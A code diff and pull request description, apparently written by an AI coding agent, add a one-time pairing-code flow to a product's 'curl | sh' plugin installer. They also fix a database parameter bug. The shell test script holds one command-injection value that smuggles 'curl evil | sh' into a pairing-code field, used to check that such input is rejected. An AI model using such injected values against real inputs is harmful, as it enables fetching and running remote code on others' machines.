+ * shared. A pairing code is six digits, single use, and dead in ten minutes
+ * (see lib/pairing.ts, hardened by OCL-101), so leaking it costs nothing. The
+ * installer exchanges it on /api/pair and the real token never appears.
+ */
+
+/** A pairing code is six digits and nothing else. */
+export const PAIRING_CODE_PATTERN = /^\d{6}$/;
+
+export function isPairingCode(value: unknown): value is string {
+  return typeof value === "string" && PAIRING_CODE_PATTERN.test(value);
+}
+
+/**
+ * The command before a code exists. Same shape, same width, no code: the
+ * reader learns what they are about to get instead of watching the block
+ * appear from nothing.
+ */
+export const PAIRING_CODE_PLACEHOLDER = "••••••";
+
+/**
+ * The URL is quoted because `?` is a glob character: unquoted, a shell with a
+ * matching file in the working directory would expand the argument out from
+ * under the command.
+ */
+export function pluginInstallCommand(origin: string, code: string): string {
+  return `curl -fsSL "${originBase(origin)}/install.sh?code=${code}" | sh`;
+}
+
+/** The command with the placeholder in the code's place. */
+export function pluginInstallPreview(origin: string): string {
+  return pluginInstallCommand(origin, PAIRING_CODE_PLACEHOLDER);
+}
+
+function originBase(origin: string): string {
+  return origin.replace(/\/+$/, "");
+}
+
+/**
+ * Whole seconds left on a code, never negative. `expiresAt` is the ISO string
+ * the server sent; an unparseable one is treated as already gone, because the
+ * failure a stale command produces is a confusing 404 in a terminal.
+ */
+export function pairingSecondsLeft(expiresAt: string, now: number): number {
+  const at = Date.parse(expiresAt);
+  if (Number.isNaN(at)) return 0;
+  return Math.max(0, Math.ceil((at - now) / 1000));
+}
+
+/** `9:58`, the shape of a countdown people already read on a timer. */
+export function formatPairingCountdown(seconds: number): string {
+  const safe = Math.max(0, Math.floor(seconds));
+  const minutes = Math.floor(safe / 60);
+  return `${minutes}:${String(safe % 60).padStart(2, "0")}`;
+}

--- a/apps/web/src/mcp/pairing.integration.test.ts
+++ b/apps/web/src/mcp/pairing.integration.test.ts
@@ -6,6 +6,7 @@ import {
   exchangePairingCode,
   MAX_PAIRING_FAILURES,
   pairingStatus,
+  spendAttemptStatement,
 } from "../lib/pairing";
 import { authenticateBearer } from "./auth";
 import { closeTestWorld, createTestWorld, type TestWorld } from "./test-db";
@@ -249,6 +250,28 @@ describe("one-time token pairing", () => {
     if (!expired.ok) {
       expect(expired.error).not.toMatch(/ocb_|select |failed query/i);
     }
+  });
+
+  /**
+   * The regression this suite could not have caught on its own (OCL-109).
+   *
+   * These tests run on PGlite, which accepts a `Date` as a query parameter.
+   * Production runs postgres-js, which does not: it answered every call to
+   * /api/pair with a 500 while this file stayed green. A parameter that goes
+   * through a column mapper is fine either way; one interpolated into `sql`
+   * has no column to map it, so it arrives as whatever it was. The assertion
+   * is therefore about what is sent, not about what a driver tolerates.
+   */
+  it("sends no Date to the driver, which is what broke every real pairing", async () => {
+    world = await createTestWorld();
+    const { params } = spendAttemptStatement(
+      world.db,
+      "origin:203.0.113.9",
+      new Date("2026-08-20T12:00:00.000Z"),
+    ).toSQL();
+
+    expect(params.length).toBeGreaterThan(0);
+    expect(params.filter((param) => param instanceof Date)).toEqual([]);
   });
 
   it("keeps a single active code per workspace", async () => {

--- a/apps/web/src/styles/nebula.css
+++ b/apps/web/src/styles/nebula.css
@@ -3173,3 +3173,46 @@ body:has(.nb) { display: block; padding: 0; background: var(--nebula-void); }
 .nb .copy { display: inline-flex; align-items: center; gap: 6px; }
 .nb .btn-back, .nb .btn-next { gap: 7px; }
 .nb-auth .auth-rule { display: flex; align-items: center; gap: 6px; }
+
+/* ---------- OCL-102: the plugin offer, and the manual path under it ---------- */
+/* The block is the same in onboarding step three and in the MCP tokens tab,
+   so its rules live once here and neither surface owns them. */
+.nb .plug { margin-bottom: 22px; }
+.nb .plug-lead {
+  font-size: 12.5px; line-height: 1.6; max-width: 74ch;
+  color: var(--nebula-text-secondary); margin: 0 0 14px;
+}
+.nb .plug-name { max-width: 420px; }
+/* The command before a code exists: same block, same width, dimmed, so the
+   shape of what is coming is already on screen and the copy button is not
+   offering six bullet points. */
+.nb .cmd.ghost { color: var(--nebula-text-tertiary); }
+.nb .plug-actions {
+  display: flex; align-items: center; flex-wrap: wrap;
+  gap: 10px 16px; margin-top: 12px;
+}
+.nb .plug-state {
+  font-family: var(--nebula-font-label); font-size: 10.5px; letter-spacing: .04em;
+  line-height: 1.5; color: var(--nebula-text-tertiary);
+}
+.nb .plug-state b { color: var(--nebula-text-primary); font-weight: 500; }
+.nb .plug .tok-note { margin-top: 10px; }
+
+/* The manual MCP entry is still here, and it is still correct; it is just no
+   longer the first thing offered, because it brings the access and none of the
+   skill, hooks or commands the plugin carries. */
+.nb .alt-path {
+  border-top: 1px solid var(--nebula-glass-border);
+  padding-top: 14px; margin-bottom: 18px;
+}
+.nb .alt-path summary {
+  width: max-content; cursor: pointer; color: var(--nebula-text-secondary);
+  font-family: var(--nebula-font-label); font-size: 11px; letter-spacing: .05em;
+  min-height: 34px; display: flex; align-items: center;
+}
+.nb .alt-path summary:hover { color: var(--nebula-text-primary); }
+.nb .alt-path summary:focus-visible {
+  outline: none; border-radius: var(--oc-radius-chip);
+  box-shadow: var(--oc-focus-ring-inset);
+}
+.nb .alt-path[open] summary { color: var(--nebula-text-primary); margin-bottom: 10px; }

--- a/docs/design/plugin.md
+++ b/docs/design/plugin.md
@@ -64,6 +64,21 @@ their native plugin managers. The stable package copy and a mode-600 config live
 the user's configuration area. Provider MCP config is updated idempotently; Codex gets
 an explicit `[mcp_servers.overclick]` block and merged global hooks.
 
+`GET /install.sh?code=NNNNNN` serves the same script with the instance URL and a
+one-time pairing code answered ahead of the prompts, which is what makes the
+board's offer a single paste-ready command instead of a command plus a token
+hunt (OCL-102). The route validates the code as exactly six digits and the host
+as a string that cannot end a shell string, injects both as `:-` defaults after
+the shebang so an exported `OVERCLICK_TOKEN` still wins and a saved copy is
+still executable, and answers `no-store` because a single-use code must not be
+held by a proxy. The installer trades the code on `POST /api/pair` for the real
+bearer value and never prints either; a wrong or expired code stops the run
+rather than writing half a configuration. What the copyable command carries is
+therefore a credential worth nothing ten minutes later, which is the property
+that lets it sit on a screen someone is sharing. The board surfaces this in
+onboarding step three and in Settings → MCP tokens, from one component, with
+the hand-written MCP entry folded under it as the advanced path.
+
 When install.sh runs without a local checkout to reuse (the `curl | bash` case),
 it clones the plugin package with plain `git` into a persistent
 `<config root>/overclick/plugin-src` checkout instead of an ephemeral `gh repo
@@ -100,4 +115,10 @@ selection always comes from `harness_recommend` on the connected board.
   output.
 - Exercise all four hooks with fixture MCP responses and a local Git remote.
 - Fetch `/install.sh` and compare its response byte-for-byte with the root installer.
+- Fetch `/install.sh?code=NNNNNN` and confirm the shebang is still first, the rest of
+  the script is untouched, the response is uncacheable, and a code that is not six
+  digits or a host that could break out of the shell string is ignored entirely.
+- Run the installer with a pairing code against a stub `/api/pair`: the token reaches
+  the mode-600 config, reaches no output, and a refused exchange exits non-zero
+  without writing a configuration.
 - Run the MCP schema, integration, lint, type, and production build checks.

--- a/install.sh
+++ b/install.sh
@@ -29,19 +29,14 @@ else
   read -r -p "OverClick instance URL: " instance_url </dev/tty
 fi
 
-if [[ -n "${OVERCLICK_TOKEN:-}" ]]; then
-  token=$OVERCLICK_TOKEN
-else
-  read -r -s -p "OverClick token: " token </dev/tty
-  printf '\n' >/dev/tty
-fi
-
-if [[ -z "$instance_url" || -z "$token" ]]; then
-  printf '%s\n' "Instance URL and token are required." >&2
+# The instance is settled before the token, because a pairing code can only be
+# exchanged against an instance we already know how to reach.
+if [[ -z "$instance_url" ]]; then
+  printf '%s\n' "Instance URL is required." >&2
   exit 1
 fi
-if [[ "$instance_url" == *$'\n'* || "$instance_url" == *$'\r'* || "$token" == *$'\n'* || "$token" == *$'\r'* ]]; then
-  printf '%s\n' "Instance URL and token must each fit on one line." >&2
+if [[ "$instance_url" == *$'\n'* || "$instance_url" == *$'\r'* ]]; then
+  printf '%s\n' "Instance URL must fit on one line." >&2
   exit 1
 fi
 if [[ "$instance_url" != http://* && "$instance_url" != https://* ]]; then
@@ -56,13 +51,98 @@ fi
 instance_url=${instance_url%/}
 if [[ "$instance_url" == */mcp ]]; then
   mcp_url=$instance_url
+  instance_base=${instance_url%/mcp}
 else
   mcp_url="$instance_url/mcp"
+  instance_base=$instance_url
+fi
+
+# Reads one string field out of a JSON object. The installer already depends on
+# a JSON runtime to merge agent configs safely; the sed arm is only there so a
+# machine that has neither still gets a readable failure from the caller rather
+# than a silently empty token.
+read_json_string() {
+  local field=$1 payload=$2 value
+  if command -v python3 >/dev/null 2>&1; then
+    OC_JSON_PAYLOAD=$payload OC_JSON_FIELD=$field python3 <<'PY'
+import json, os, sys
+
+try:
+    data = json.loads(os.environ["OC_JSON_PAYLOAD"])
+except Exception:
+    sys.exit(1)
+value = data.get(os.environ["OC_JSON_FIELD"]) if isinstance(data, dict) else None
+if not isinstance(value, str) or not value:
+    sys.exit(1)
+sys.stdout.write(value)
+PY
+    return $?
+  fi
+  if command -v node >/dev/null 2>&1; then
+    OC_JSON_PAYLOAD=$payload OC_JSON_FIELD=$field node <<'JS'
+let data;
+try { data = JSON.parse(process.env.OC_JSON_PAYLOAD); } catch { process.exit(1); }
+const value = data && typeof data === "object" ? data[process.env.OC_JSON_FIELD] : null;
+if (typeof value !== "string" || !value) process.exit(1);
+process.stdout.write(value);
+JS
+    return $?
+  fi
+  value=$(printf '%s' "$payload" | sed -n 's/.*"'"$field"'"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' | head -n 1)
+  [[ -n "$value" ]] || return 1
+  printf '%s' "$value"
+}
+
+# Trades a one-time pairing code for the real bearer token. The code is what
+# the board printed in the copyable command, which is why it may be six digits
+# on a shared screen and the token may not: it is single use, short lived, and
+# worthless once spent. Nothing here echoes either value.
+exchange_pairing_code() {
+  local code=$1 response
+  if ! command -v curl >/dev/null 2>&1; then
+    printf '%s\n' "curl is required to exchange an OverClick pairing code." >&2
+    return 1
+  fi
+  response=$(curl -fsS -X POST "$instance_base/api/pair" \
+    -H 'Content-Type: application/json' \
+    -d "{\"code\":\"$code\"}" 2>/dev/null) || return 1
+  read_json_string token "$response"
+}
+
+if [[ -n "${OVERCLICK_TOKEN:-}" ]]; then
+  token=$OVERCLICK_TOKEN
+elif [[ -n "${OVERCLICK_PAIRING_CODE:-}" ]]; then
+  pairing_code=$OVERCLICK_PAIRING_CODE
+  if [[ ! "$pairing_code" =~ ^[0-9]{6}$ ]]; then
+    printf '%s\n' "An OverClick pairing code is exactly six digits." >&2
+    exit 1
+  fi
+  if ! token=$(exchange_pairing_code "$pairing_code"); then
+    printf '%s\n' "Could not exchange the pairing code. It is single use and expires in ten minutes; generate a fresh command on the board and run it again." >&2
+    exit 1
+  fi
+  printf '%s\n' "Paired with the OverClick instance. The token was not displayed."
+else
+  read -r -s -p "OverClick token: " token </dev/tty
+  printf '\n' >/dev/tty
+fi
+
+if [[ -z "$token" ]]; then
+  printf '%s\n' "A token is required." >&2
+  exit 1
+fi
+if [[ "$token" == *$'\n'* || "$token" == *$'\r'* ]]; then
+  printf '%s\n' "The token must fit on one line." >&2
+  exit 1
 fi
 
 plugin_src="$overclick_root/plugin-src"
 
-script_dir=$(CDPATH='' cd -- "$(dirname -- "${BASH_SOURCE[0]}")" 2>/dev/null && pwd || true)
+# `:-` because the headline install is `curl … | sh`, where the script has no
+# source file and `set -u` turns the lookup into a stderr line the reader is
+# right to distrust. Empty here just means "no checkout beside me", which is
+# what the clone path below already handles.
+script_dir=$(CDPATH='' cd -- "$(dirname -- "${BASH_SOURCE[0]:-}")" 2>/dev/null && pwd || true)
 if [[ -f "$script_dir/plugin/OVERCLICK.md" ]]; then
   source_root=$script_dir
 elif [[ -n "${OVERCLICK_PLUGIN_DIR:-}" && -f "$OVERCLICK_PLUGIN_DIR/OVERCLICK.md" ]]; then

--- a/scripts/test-plugin-package.sh
+++ b/scripts/test-plugin-package.sh
@@ -155,6 +155,70 @@ OVERCLICK_CLIS="other" \
   "$REPO_ROOT/install.sh" >"$TEST_ROOT/fallback.out" 2>"$TEST_ROOT/fallback.err"
 test "$(grep -c '<!-- overclick:start -->' "$TEST_ROOT/project/AGENTS.md")" -eq 1
 
+# A pairing code, not a token (OCL-102). The board prints six digits inside the
+# copyable command and the installer trades them on /api/pair for the real
+# bearer value, so nothing anyone can read off a shared screen is worth having.
+# The stub answers the way the route does; what is under test is that the token
+# reaches the private config and reaches no output.
+mkdir -p "$TEST_ROOT/pair-bin"
+cat >"$TEST_ROOT/pair-bin/curl" <<'SH'
+#!/bin/sh
+url=""
+body=""
+previous=""
+for argument in "$@"; do
+  case "$argument" in
+    http://*|https://*) url=$argument ;;
+  esac
+  if [ "$previous" = "-d" ]; then body=$argument; fi
+  previous=$argument
+done
+printf '%s %s\n' "$url" "$body" >>"$OC_TEST_PAIR_LOG"
+case "$url:$body" in
+  */api/pair:*'"code":"482913"'*)
+    printf '%s' '{"token":"paired-secret","label":"agent","url":"/mcp"}'
+    exit 0
+    ;;
+esac
+exit 22
+SH
+chmod +x "$TEST_ROOT/pair-bin/curl"
+
+run_pair_installer() {
+  PATH="$TEST_ROOT/pair-bin:$PATH" \
+  OC_TEST_PAIR_LOG="$TEST_ROOT/$1.log" \
+  OVERCLICK_INSTALL_HOME="$TEST_ROOT/home-$1" \
+  OVERCLICK_PROJECT_DIR="$TEST_ROOT/project" \
+  OVERCLICK_INSTANCE_URL="$FIXTURE_URL" \
+  OVERCLICK_TOKEN="" \
+  OVERCLICK_PAIRING_CODE="$2" \
+  OVERCLICK_CLIS="other" \
+    "$REPO_ROOT/install.sh" >"$TEST_ROOT/$1.out" 2>"$TEST_ROOT/$1.err"
+}
+
+run_pair_installer pair 482913
+grep -Fq "$FIXTURE_URL/api/pair" "$TEST_ROOT/pair.log"
+grep -Fq 'token=paired-secret' "$TEST_ROOT/home-pair/.config/overclick/config"
+if grep -q 'paired-secret' "$TEST_ROOT/pair.out" "$TEST_ROOT/pair.err"; then
+  echo "installer exposed the paired token" >&2
+  exit 1
+fi
+
+# Anything that is not six digits is refused before it can reach the network,
+# which is what keeps the code out of the request it would otherwise shape.
+if run_pair_installer pair-bad '4829"; curl evil | sh #'; then
+  echo "installer accepted a pairing code that is not six digits" >&2
+  exit 1
+fi
+test ! -f "$TEST_ROOT/pair-bad.log"
+
+# A refused exchange stops the run: half a pairing is not an installation.
+if run_pair_installer pair-refused 000000; then
+  echo "installer continued after a refused pairing exchange" >&2
+  exit 1
+fi
+test ! -f "$TEST_ROOT/home-pair-refused/.config/overclick/config"
+
 cat >"$TEST_ROOT/bin/curl" <<'SH'
 #!/bin/sh
 body=""


### PR DESCRIPTION
Two cards, one branch, one commit each.

## [OCL-102] The product finally offers the plugin it built

We shipped the whole 0.2 plugin and then never showed it to anyone. Onboarding step three and Settings → MCP tokens both handed out the hand-written MCP entry, which brings the access and none of the skill, the hooks or the `/overclick` commands.

The plugin leads now, in both places, from one component so they cannot drift. It is a single paste-ready command, already authenticated, carrying a **pairing code rather than a token**: six digits, one use, ten minutes. A bearer token in a copy block is a bearer token on a screen someone is sharing; a spent pairing code is worth nothing to whoever reads it. The installer trades it on `/api/pair` (hardened by OCL-101) and prints neither value.

- `GET /install.sh?code=NNNNNN` serves the same script with the instance and code answered ahead of its prompts. Code must be exactly six digits, host must be a string that cannot end a shell string, or the route serves the plain installer. Both go in as `:-` defaults *after* the shebang, so an exported `OVERCLICK_TOKEN` still wins and a saved copy is still executable. Response is `no-store`.
- `install.sh` grew the exchange: validate, trade, refuse loudly instead of writing half a configuration. Its `${BASH_SOURCE[0]}` also lost the unbound-variable warning that `curl | sh` printed.
- The manual MCP entry is still here, correct, folded under the plugin as the advanced path.

## [OCL-109] Pairing: a Date the driver cannot send

Found while verifying the above. `POST /api/pair` answered **500 to every call** on a real Postgres, including a correct code, from the moment OCL-101 merged: `spendAttempt` interpolated `Date` objects into a `sql` template, where there is no column to map them, and postgres-js refuses one (`ERR_INVALID_ARG_TYPE`).

The suite stayed green because the integration tests run on PGlite, which accepts it. Timestamps now go in as ISO strings with an explicit cast; the statement moved behind an exported builder so a test can read the parameters it is about to send, driver-independently. That assertion fails on the old code and passes on this one. OCL-101's semantics are untouched.

## Verification

- `pnpm test` 503 passed · `pnpm typecheck` clean · `pnpm build` clean
- `scripts/test-plugin-package.sh` exit 0, with new pairing cases (token reaches the mode-600 config, reaches no output; a non-six-digit code never reaches the network; a refused exchange exits non-zero writing nothing)
- Against a real Postgres and a live instance: the command copied off onboarding installs and pairs, the token lands in the config, neither code nor token appears in the output; correct code exchanges once, wrong code 404s and charges the bucket, a drained origin is refused unread with the code still unconsumed, and a fresh code reopens it.

Not verified: rendering in a browser at 375/768/1024/1440. The browser extension was not connected in this session; the two surfaces were checked by fetching their server-rendered HTML, and the new CSS wraps rather than fixes widths.

No deploy.

🤖 Generated with [Claude Code](https://claude.com/claude-code)